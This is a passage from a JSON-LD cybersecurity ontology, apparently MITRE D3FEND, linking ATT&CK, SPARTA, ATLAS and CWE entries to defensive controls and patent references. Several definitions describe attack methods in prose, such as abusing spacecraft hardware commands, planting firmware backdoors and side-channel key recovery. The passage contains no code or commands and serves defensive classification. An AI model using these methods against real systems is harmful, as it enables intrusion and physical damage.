      "@id": "d3f:T1060",
      "@type": "owl:Class",
      "d3f:attack-id": "T1060",
      "d3f:definition": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.001",
      "rdfs:label": "Registry Run Keys / Startup Folder",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:DataExchangeMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DataExchangeMapping"
      ],
      "d3f:d3fend-id": "D3-DEM",
      "d3f:definition": "Data exchange mapping identifies and models the organization's intended design for the flows of the data types, formats, and volumes between systems at the application layer.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": {
        "@id": "d3f:DataDependency"
      },
      "d3f:synonym": [
        "Data Flow Mapping",
        "Information Exchange Mapping"
      ],
      "rdfs:label": "Data Exchange Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:N9c39b13c4a194ea3916b0512b1dc5f96"
        }
      ]
    },
    {
      "@id": "_:N9c39b13c4a194ea3916b0512b1dc5f96",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DataDependency"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForValidatingIn-memoryIntegrityOfExecutableFilesToIdentifyMaliciousActivity_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190018962A1/en?oq=15648887"
      },
      "d3f:kb-abstract": "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in volatile memory of a computing device before the instructions are executed. The malicious code detection module identifies an executable file, such as an .exe file, in memory, validates one or more components of the executable file against the same file stored in non-volatile storage, and issues an alert if the validation fails.",
      "d3f:kb-author": "Joseph W. Desimone",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "System and method for validating in-memory integrity of executable files to identify malicious activity",
      "rdfs:label": "Reference - System and method for validating in-memory integrity of executable files to identify malicious activity - Endgame Inc"
    },
    {
      "@id": "d3f:CACertificateFile",
      "@type": "owl:Class",
      "d3f:definition": "A file containing a digital certificate issued by a certificate authority (CA).  Certificate authorities store, issue, and sign digital certificates used as part of the public key infrastructure.",
      "rdfs:label": "CA Certificate File",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Certificate_authority"
        },
        {
          "@id": "dbr:Public_key_infrastructure"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "d3f:DocumentFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A document is a written, drawn, presented or recorded representation of thoughts. An electronic document file is usually used to describe a primarily textual file, along with its structure and design, such as fonts, colors and additional images.",
      "d3f:may-contain": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Document File",
      "rdfs:seeAlso": {
        "@id": "dbr:Document"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N74451909868140579892ffa5cfdfe1f4"
        }
      ]
    },
    {
      "@id": "_:N74451909868140579892ffa5cfdfe1f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:EventLogStopEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that the event logging service has been stopped, halting the recording of system events.",
      "rdfs:label": "Event Log Stop Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLogEvent"
        },
        {
          "@id": "_:N32ef41ac97894e1dba4996221b8efde6"
        }
      ]
    },
    {
      "@id": "_:N32ef41ac97894e1dba4996221b8efde6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogStartEvent"
      }
    },
    {
      "@id": "d3f:HardwareTimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "A timer event involving a physical timer mechanism implemented in hardware components.",
      "rdfs:label": "Hardware Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TimerEvent"
        },
        {
          "@id": "_:Nb1c60fabe3aa4ed78111d5b354cfdce6"
        }
      ]
    },
    {
      "@id": "_:Nb1c60fabe3aa4ed78111d5b354cfdce6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareTimer"
      }
    },
    {
      "@id": "d3f:EX-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0005",
      "d3f:definition": "The adversary achieves execution or effect by corrupting or steering behavior beneath the software stack, in device firmware, programmable logic, or the hardware itself. Examples include tampering with firmware images or configuration blobs burned into non-volatile memory; targeting MCU/SoC boot ROM fallbacks; editing FPGA bitstreams or partial-reconfiguration frames; or leveraging physical phenomena and timing to flip bits or skip checks. Because these actions occur below or alongside the operating system and application FSW, traditional endpoint safeguards see normal interfaces while trust anchors are already altered.",
      "rdfs:label": "Exploit Hardware/Firmware Corruption - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Exploit Hardware/Firmware Corruption"
    },
    {
      "@id": "d3f:EX-0005.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0005.02",
      "d3f:definition": "Threat actors may issue low-level device or maintenance commands that act directly on hardware, bypassing much of the high-level command mediation. These may be memory-mapped register writes forwarded over the bus, vendor-specific instrument/control opcodes, built-in-test and calibration modes, boot-mode or fuse-programming sequences, file/sector operations to on-board non-volatile stores, or actuator primitives for wheels, thrusters, motors, heaters, and RF chains. Because these interfaces exist to configure sensors, zero momentum, switch power domains, tune gains, or adjust clocks, they can also be sequenced to produce harmful effects: over-driving mechanisms, altering persistent calibration, disabling watchdogs, or switching timing sources. Some hardware command sets are only exposed in maintenance or contingency modes, while others are always reachable through gateway processors that translate high-level telecommands into device-level operations. By crafting orders that respect expected framing and rate/size limits, the adversary can induce mechanical, electrical, or logical state changes with immediate, high-privilege impact, all while appearing to exercise legitimate device capabilities.",
      "d3f:produces": {
        "@id": "d3f:OTModifyDeviceConfigurationCommand"
      },
      "rdfs:label": "Malicious Use of Hardware Commands - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0005/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0005"
        },
        {
          "@id": "_:Nf097055861cb4079a59e1b9b18575887"
        }
      ],
      "skos:prefLabel": "Malicious Use of Hardware Commands"
    },
    {
      "@id": "_:Nf097055861cb4079a59e1b9b18575887",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:CWE-345",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-345",
      "d3f:definition": "The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.",
      "rdfs:label": "Insufficient Verification of Data Authenticity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:Reference-StreamingPhish",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://github.com/wesleyraptor/streamingphish"
      },
      "d3f:kb-abstract": "This is a utility that uses supervised machine learning to detect phishing domains from the Certificate Transparency log network.",
      "d3f:kb-author": "Wes Connell",
      "d3f:kb-organization": "Uber",
      "d3f:kb-reference-of": {
        "@id": "d3f:PassiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "StreamingPhish",
      "rdfs:label": "Reference - StreamingPhish"
    },
    {
      "@id": "d3f:DNSQueryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DNS query is made to resolve a domain name.",
      "rdfs:label": "DNS Query Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DNSEvent"
      }
    },
    {
      "@id": "d3f:Reference-ModificationOfAServerToMimicADeceptionMechanism_AcalvioTechnologiesInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170149825A1"
      },
      "d3f:kb-abstract": "Provided are devices, computer-program products, and methods (e.g., methods implemented by a production system or security agent program or process) for providing services on a production system to mimic a deception mechanism. For example, a method can include determining a deception characteristic of a deception mechanism and determining a production characteristic of the production system. The method can further include determining an additional service or a modification of an existing service of the production system using the deception characteristic and the production characteristic. In some cases, the additional service and/or the modification can be a deterrent to potential attackers of the production system. The method can further include modifying the production system to mimic the deception mechanism, including adding the additional service to the production system or modifying the existing service using the modification.",
      "d3f:kb-author": "Sreenivas Gukal, Rammohan Varadarajan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Acalvio Technologies Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ConnectedHoneynet"
      },
      "d3f:kb-reference-title": "Modification of a Server to Mimic a Deception Mechanism",
      "rdfs:label": "Reference - Modification of a Server to Mimic a Deception Mechanism - Acalvio Technologies Inc"
    },
    {
      "@id": "d3f:TA0034",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Impact - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:T1059",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1059",
      "d3f:definition": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
      "d3f:executes": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Command and Scripting Interpreter",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N5054bc1035e443c08c641eb1f89dcf89"
        }
      ]
    },
    {
      "@id": "_:N5054bc1035e443c08c641eb1f89dcf89",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-009%3ADetectingShadowCopyDeletionViaVssadmin.exe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-009/"
      },
      "d3f:kb-abstract": "After compromising a network of systems, threat actors often try to delete Shadow Copy in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. Failing to detect this technique, which is often employed by ransomware strains such as “Olympic Destroyer”, may lead to a failure in recovering systems after an attack.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe",
      "rdfs:label": "Reference - CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe - MITRE"
    },
    {
      "@id": "d3f:FTPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the File Transfer Protocol (FTP), a standard network protocol used to transfer files between a client and server over a TCP/IP network. FTP facilitates operations such as file uploads, downloads, directory listing, and remote file management.",
      "rdfs:label": "FTP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/ftp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:Nd3d0d3f139374c41b5cba9df4c67899c"
        }
      ]
    },
    {
      "@id": "_:Nd3d0d3f139374c41b5cba9df4c67899c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileTransferNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001774_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs a deny-all, permit-by-exception policy to allow the execution of authorized software programs on the information system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001774"
    },
    {
      "@id": "d3f:GetScreenCapture",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Get Screen Capture",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:MemoryAllocationFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reserves memory for a running process to use.",
      "d3f:invokes": {
        "@id": "d3f:AllocateMemory"
      },
      "rdfs:label": "Memory Allocation Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N73fdb79d991d4ad1aec9d69caa2bc02a"
        }
      ]
    },
    {
      "@id": "_:N73fdb79d991d4ad1aec9d69caa2bc02a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AllocateMemory"
      }
    },
    {
      "@id": "d3f:Matching",
      "@type": "owl:Class",
      "rdfs:label": "Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:PER-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0002",
      "d3f:definition": "A backdoor is a covert access path that bypasses normal authentication, authorization, or operational checks so the attacker can reenter the system on demand. Backdoors may be preexisting (undocumented service modes, maintenance accounts, debug features) or introduced by the adversary during development, integration, or on-orbit updates. Triggers range from “magic” opcodes and timetags to specific geometry/time conditions, counters, or data patterns embedded in routine traffic. The access they provide varies from expanded command sets and relaxed rate/size limits to alternate communications profiles and hidden file/parameter interfaces. Well-crafted backdoors blend with nominal behavior, appearing as ordinary operations while quietly accepting instructions that other paths would reject, thereby sustaining the attacker’s foothold across passes, resets, and operator handovers.",
      "rdfs:label": "Backdoor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAPersistenceTechnique"
      },
      "skos:prefLabel": "Backdoor"
    },
    {
      "@id": "d3f:CWE-341",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-341",
      "d3f:definition": "A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc.",
      "rdfs:label": "Predictable from Observable State",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-340"
      }
    },
    {
      "@id": "d3f:T0828",
      "@type": "owl:Class",
      "d3f:attack-id": "T0828",
      "d3f:definition": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments.",
      "rdfs:label": "Loss of Productivity and Revenue - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Productivity and Revenue"
    },
    {
      "@id": "d3f:modified",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date on which the resource was changed.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date modified"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:CWE-828",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-828",
      "d3f:definition": "The product defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted.",
      "rdfs:label": "Signal Handler with Functionality that is not Asynchronous-Safe",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-364"
      }
    },
    {
      "@id": "d3f:Metadata",
      "@type": "owl:Class",
      "d3f:definition": "Metadata is information which describes aspects of other information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Metadata"
      },
      "rdfs:label": "Metadata",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/metadata"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:Exec",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:executes": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "Exec",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Exec"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N3c298de1e65a4f85a479eb545989f6b8"
        }
      ]
    },
    {
      "@id": "_:N3c298de1e65a4f85a479eb545989f6b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:OTReadTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read timing mechanisms.",
      "rdfs:label": "OT Read Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTTimeCommandEvent"
        },
        {
          "@id": "_:N6250b0c8be2745898a40dd3a926566ed"
        }
      ]
    },
    {
      "@id": "_:N6250b0c8be2745898a40dd3a926566ed",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadTimeCommand"
      }
    },
    {
      "@id": "d3f:T0837",
      "@type": "owl:Class",
      "d3f:attack-id": "T0837",
      "d3f:definition": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel.",
      "rdfs:label": "Loss of Protection - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Protection"
    },
    {
      "@id": "d3f:AML.T0035",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0035",
      "d3f:definition": "Adversaries may collect AI artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [AI Attack Staging](/tactics/AML.TA0001).\nAI artifacts include models and datasets as well as other telemetry data produced when interacting with a model.",
      "rdfs:label": "AI Artifact Collection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0035"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "AI Artifact Collection"
    },
    {
      "@id": "d3f:IA-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005.01",
      "d3f:definition": "With a local vantage point, an adversary analyzes unintentional emissions to infer sensitive information. Crypto modules, command decoders, and main bus controllers can emit patterns correlated with key use, counter updates, or command parsing. Close-range sampling enables coherent averaging, directional sensing, and correlation against known command/telemetry sequences to separate signal from noise. If the emanations are information-bearing (e.g., side-channel leakage of keys, counters, or protocol state), they can be used to reconstruct authentication material, predict anti-replay windows, or derive decoder settings, providing a basis for initial access via crafted traffic.",
      "rdfs:label": "Compromise Emanations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0005"
      },
      "skos:prefLabel": "Compromise Emanations"
    },
    {
      "@id": "d3f:FTPPutEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is uploaded from a client to an FTP server, transferring data from the local system to the remote destination.",
      "rdfs:label": "FTP Put Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FTPEvent"
      }
    },
    {
      "@id": "d3f:AML.T0011",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0011",
      "d3f:definition": "An adversary may rely upon specific actions by a user in order to gain execution.\nUsers may inadvertently execute unsafe code introduced via [AI Supply Chain Compromise](/techniques/AML.T0010).\nUsers may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.",
      "rdfs:label": "User Execution - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0011"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExecutionTechnique"
      },
      "skos:prefLabel": "User Execution"
    },
    {
      "@id": "d3f:CCI-001452_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the organization-defined time period during which the limit of consecutive invalid access attempts by a user is counted.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-25T00:00:00"
      },
      "rdfs:label": "CCI-001452"
    },
    {
      "@id": "d3f:ApplicationConfigurationDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database record holding information used to configure the parameters and initial settings for an application.",
      "rdfs:label": "Application Configuration Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "d3f:ConfigurationDatabaseRecord"
        }
      ]
    },
    {
      "@id": "d3f:OTPauseCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to pause a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Pause Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N78ebe9ae1e784f97ab46105d0de47781"
        }
      ]
    },
    {
      "@id": "_:N78ebe9ae1e784f97ab46105d0de47781",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:ATTACKMobileCommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0037"
      },
      "rdfs:label": "Command and Control Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N2f9a4e2c127844ea92512093ea9a2cb9"
        }
      ],
      "skos:prefLabel": "Command and Control Technique"
    },
    {
      "@id": "_:N2f9a4e2c127844ea92512093ea9a2cb9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0037"
      }
    },
    {
      "@id": "d3f:T1454",
      "@type": "owl:Class",
      "d3f:attack-id": "T1454",
      "d3f:definition": "Test",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by",
      "rdfs:label": "Malicious SMS Message - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Malicious SMS Message"
    },
    {
      "@id": "d3f:CCI-001211_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, at organization-defined information system components, loads and executes organization-defined applications from hardware-enforced, read-only media.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001211"
    },
    {
      "@id": "d3f:T1570",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1570",
      "d3f:definition": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.",
      "d3f:produces": {
        "@id": "d3f:IntranetFileTransferTraffic"
      },
      "rdfs:label": "Lateral Tool Transfer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N0a5785926c1d41f1b6b1bc077774f032"
        }
      ]
    },
    {
      "@id": "_:N0a5785926c1d41f1b6b1bc077774f032",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetFileTransferTraffic"
      }
    },
    {
      "@id": "d3f:Reference-ApproachesForSecuringAnInternetEndpointUsingFine-grainedOperatingSystemVirtualization_Bromium,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110296412A1"
      },
      "d3f:kb-abstract": "Approaches for executing untrusted software on a client without compromising the client using micro-virtualization to execute untrusted software in isolated contexts. A template for instantiating a virtual machine on a client is identified in response to receiving a request to execute an application. After the template is identified, without human intervention, a virtual machine is instantiated, using the template, in which the application is to be executed. The template may be selected from a plurality of templates based on the nature of the request, as each template describes characteristics of a virtual machine suitable for a different type of activity. Selected resources such as files are displayed to the virtual machines according to user and organization policies and controls. When the client determines that the application has ceased to execute, the client ceases execution of the virtual machine without human intervention.",
      "d3f:kb-author": "Gaurav Banga, Ian Pratt, Kiran Bondalapati, Vikram Kapoor",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bromium, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Approaches for securing an internet endpoint using fine-grained operating system virtualization",
      "rdfs:label": "Reference - Approaches for securing an internet endpoint using fine-grained operating system virtualization - Bromium, Inc."
    },
    {
      "@id": "d3f:CWE-1099",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1099",
      "d3f:definition": "The product's code, documentation, or other artifacts do not consistently use the same naming conventions for variables, callables, groups of related callables, I/O capabilities, data types, file names, or similar types of elements.",
      "rdfs:label": "Inconsistent Naming Conventions for Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:CWE-116",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-116",
      "d3f:definition": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.",
      "d3f:synonym": [
        "Output Encoding",
        "Output Sanitization",
        "Output Validation"
      ],
      "rdfs:label": "Improper Encoding or Escaping of Output",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:T1053.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.006",
